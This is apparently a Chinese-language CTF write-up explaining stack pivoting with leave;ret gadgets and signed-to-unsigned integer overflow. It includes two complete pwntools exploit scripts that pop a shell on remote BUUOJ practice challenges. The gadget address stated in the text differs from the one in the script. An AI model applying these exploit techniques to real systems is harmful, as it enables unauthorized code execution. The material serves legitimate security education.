栈空间迁移导致getshell

2023-03-02 12:51:45

所属地 海外

![](https://image.3001.net/images/20240308/1709876354_65eaa4828e91d155430d9.png) 本文由 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

Pwn之栈迁移
-------

当溢出的数据长度不够写入完整的ROP利用链时，需要进行栈迁移来扩充可利用栈的大小，即是需要控制ESP指针的指向。

其中使用的指令为（leave;ret）

leave 等价于

move %ebp %esp   //esp=ebp

pop %ebp         //ebp=ebp处填充的值

ret           //ret等价于pop eip    //出栈esp+4

栈迁移过程中栈空间的变化如下.

![](https://image.3001.net/images/20230302/1677731011_640024c391348c955360f.png)

通过对两次的leave ret（其中一次是被调函数自身，一次是覆盖在返回地址处的）成功控制一个栈空间的大小及内容。

在上图使用的可控栈空间为原生栈，也可以将该段可控栈迁移到一段我们可读写控制的地方，如bss段等。1，     泄漏上一个栈空间的旧EBP的值，通过调试得到上一个栈空间的大小从而计算出栈空间的地址

2，     寻找指令leave ret指令完成栈的迁移，并在栈中写入自己的rop链

### 例题：

首先检查对应的保护措施（checksec）

![](https://image.3001.net/images/20230302/1677731170_64002562d400cc856fca1.png)

检查得知为32位程序，开启了NX栈不可执行

使用IDA查看源码

![](https://image.3001.net/images/20230302/1677731208_64002588b50b626f8308c.png)进入vul函数,如下

![](https://image.3001.net/images/20230302/1677731672_6400275827e227b407f28.png)

存在两个read

查看s的大小为0x28，即是当输入超过0x28时会造成溢出，即是在read函数存在溢出，溢出大小为8字节，为32位程序，刚好可以溢出覆盖旧的ebp和返回地址的值。由于可溢出长度不够写入利用链，故采取栈迁移的方式寻找system的地址为0x08048400

![](https://image.3001.net/images/20230302/1677731726_6400278e0ad194398b019.png)

1.       泄漏上一个栈空间的旧EBP的值，通过调试得到上一个栈空间的大小从而计算出栈空间的地址

2.       寻找指令leave ret指令完成栈的迁移，并在栈中写入自己的rop链

动态调试寻找调用vul函数之前的函数栈空间的大小（加载过程中地址是不一样的，但间距保持不变）

![](https://image.3001.net/images/20230302/1677731778_640027c26e61e3b372341.png)

计算得出上一个函数的栈空间大小为0x10

输入字符串距离ebp的距离为0x28

![](https://image.3001.net/images/20230302/1677731818_640027ead7e1f1112700f.png)

寻找leave;ret指令的地址ROPgadget --binary ciscn\_2019\_es\_2 --only 'leave|ret'

地址为0x080484b8

![](https://image.3001.net/images/20230302/1677731970_640028823065259b6691a.png)

开始构造payload

利用printf泄漏旧ebp的值

payload1='a'\*0x26+'b'\*0x2

返回地址覆盖leave ret指令地址，ebp处覆盖新迁移设计的栈顶位置，以及安排调用函数及参数的位置payload2=b'a'\*4+p32(sys)+b'a'\*4+p32(ebp-0x38+0x10)+b'/bin/sh'

payload2=payload2.ljust(0x28,b'\\x00')

payload2=payload2+p32(ebp-0x38)+p32(leave\_ret)

完整poc如下

from pwn import \*

context.log\_level = "debug"

sh=remote("node4.buuoj.cn",29298)

elf=ELF("./ciscn\_2019\_es\_2")

sys=p32(elf.plt\['system'\])

leave\_ret=0x080485FD

sh.recv()

payload1='a'\*0x26+'b'\*0x2

sh.send(payload1)

sh.recvuntil("bb")

ebp=u32(sh.recv(4))

print(ebp)

print("find the ebp addr:%s"%hex(ebp))

payload2=b'a'\*0x4+sys+b'aaaa'+p32(ebp-0x38+0x10)+b'/bin'+b'/sh\\x00'

payload2=payload2.ljust(0x28,b'\\x00')

payload2=payload2+p32(ebp-0x38)+p32(leave\_ret)

sh.send(payload2)

sh.interactive()

![](https://image.3001.net/images/20230302/1677732184_64002958f0b10442f494b.png)

![](https://image.3001.net/images/20230302/1677732212_64002974d960dce686e0a.png)

成功getshell

通过溢出执行特定的指令，修改ebp和esp的值构造出一个可执行任意命令的空间从而得到系统控制权限。

整数溢出
----

整数溢出漏洞是指当对一个整数变量进行操作时，其值超过了该变量在内存空间中所能存储的最大值，从而导致程序产生无法预测的行为，有时甚至会允许攻击者执行任意代码。这种漏洞通常是由于输入验证不正确和内存分配不足所导致。例如，程序可能接受用户输入但没有正确验证其大小，从而导致溢出。此外，程序可能为整数变量分配不足的内存，导致在操作过程中出现溢出。成功的整数溢出攻击可以导致系统被攻击者接管，从而导致未经授权访问敏感数据、服务中断和其他恶意行为。为避免这种漏洞，需要进行正确的输入验证和内存管理，并为整数变量分配足够的内存空间。

### 例题：

检查安全保护

Checksec,为64位程序，且开启了堆栈不可执行

![](https://image.3001.net/images/20230302/1677732353_64002a01b5535fd979ba3.png)

使用IDA64进行分析

程序逻辑是：输入一个数字，当数字小于10时，输入该数字长度的姓名字符，否则退出。

漏洞点：输入的数字使用的是有符号型的整数定义，读取长度限制时转化为无符号的整数，即是可以用负数进行绕过，即是整数的溢出。

![](https://image.3001.net/images/20230302/1677732382_64002a1e0b3f220e23c8f.png)

且在查找字符串时发现有/bin/sh字段，跟踪发现存在后门函数

![](https://image.3001.net/images/20230302/1677732411_64002a3b5d00c89eb6457.png)

通过输入负数造成溢出，调用后门函数即可getshell

EXP如下：

from pwn import \*

#context.log\_level="debug"

sh=remote("node4.buuoj.cn",25911)

#elf=ELF("./bjdctf\_2020\_babystack2")

backdoor\_addr=0x400726

payload=b"-1"

payload1=b'a'\*0x18+p64(backdoor\_addr)

#sh.recvuntil("Please input the length of your name:")

sh.recv()

sh.sendline('-1')

sh.recv()

#sh.recvuntil("What's u name?")

sh.send(payload1)

sh.interactive()

![](https://image.3001.net/images/20230302/1677732449_64002a61671cb4df11860.png)

成功获取shell

在程序中输入数字时，需要确定其大小，避免溢出，或者是在正负数之间转化时同样需要进行检查以避免系统权限被控制。

\# 漏洞 \# 系统安全 \# 漏洞分析 \# CTF